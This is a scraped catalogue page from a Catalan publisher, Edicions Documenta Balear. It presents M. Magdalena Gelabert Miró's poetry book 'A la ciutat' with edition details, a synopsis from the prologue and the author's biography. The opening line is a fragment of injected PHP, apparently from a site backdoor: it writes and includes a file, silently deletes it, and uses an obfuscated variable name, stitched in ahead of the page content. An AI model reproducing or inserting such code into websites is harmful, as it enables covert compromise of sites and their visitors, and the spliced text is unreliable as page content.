");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - A la ciutat
Cercador d'Obres
ORDENAR:
Començar recerca

A la ciutat

Gelabert Miró, M. Magdalena

Prologuista:
Amb il·lustracions de Maria Magdalena Tugores i pròleg de Llucia Serra
Col·lecció:
Magatzem Can Toni
Tema:
Poesia
Pàgines:
68
PVP:
15.00
ISBN:
978-84-17113-45-2
Data d'Edició:
06/03/2019
Els espais i personatges del paisatge urbà cobren una dimensió universal.
Sinopsi
En comparació amb els poemaris anteriors, A la ciutat se centra en els motius del món físic, però sense deixar de banda les emocions que s’hi relacionen. El títol del poemari anticipa honestament la idea central de la poesia que conté: la descripció de la ciutat, des d’una òptica subjectiva. A través de les seves pàgines, els lectors podran compartir amb l’autora els espais i personatges que formen el paisatge urbà. La tria dels motius dels poemes demostra la sensibilitat de la poeta, que és capaç de captar detalls preciosos que podrien passar desapercebuts a simple vista. 
Tots nosaltres, habitants, usuaris o visitants de les ciutats, podem trobar en aquests versos l’evocació de llocs coneguts, de records personals que cobren una dimensió universal.


[Del pròleg de Llucia Serra Ferré]


Veure el Sumari
M. Magdalena Gelabert Miró
Nascuda a Manacor, és doctora en Llengua i Literatura Catalanes per la UIB. El 2015 obtingué el Premi Santander-UIB als millors estudiants de doctorat de la UIB. Des del 2008, forma part del Grup de Recerca en Etnopoètica de les Illes Balears (GREIB) de la UIB, i és membre de la Societat Catalana de Llengua i Literatura, filial de l’IEC, a través del Grup d’Estudis Etnopoètics; de l’As­sociació Internacional de Llengua i Literatura Catalanes i del Consell Assessor de Cultura Popular del Consell de Mallorca. L’any 2008 rebé el Reconeixement de Mèrits de l’Escola Municipal de Mallorquí de Manacor i el 2017 va rebre el Premi Aina Moll que atorga l’Obra Cultural Balear. L’any 2018 obtingué el Premi Ciutat de Manacor d’Assaig Antoni M. Alcover publicat amb el títol La dona a les Rondalles Mallorquines d’Antoni M. Alcover (2018) i el Premi Mallorca d’Assaig amb l’obra Antoni M. Alcover i les dones. És autora de Breu història de la llengua catalana (2002), el mateix any, amb el seu germà Joan va ser guardonada amb la Beca Antoni M. Alcover d’Estudi de la Llengua gràcies a la qual publicaren Societat, llengua i comunicació a Manacor: el paper dels joves, (2003). També és autora de l’Estudi del Sermó de la Conquista de Mallorca d’Antoni M. Alcover (2008), de l’edició crítica de la Vetlada de Glosadors (2009) i de l’única novel·la d’Alcover, N’Arnau (2011). Com a poeta és autora de Dona sàpiens (2012), Essència de mare (2017), A la ciutat (2019) i Quaranta cobles a la saviesa (2020).


Recomanar
Comentar
Comentaris (0)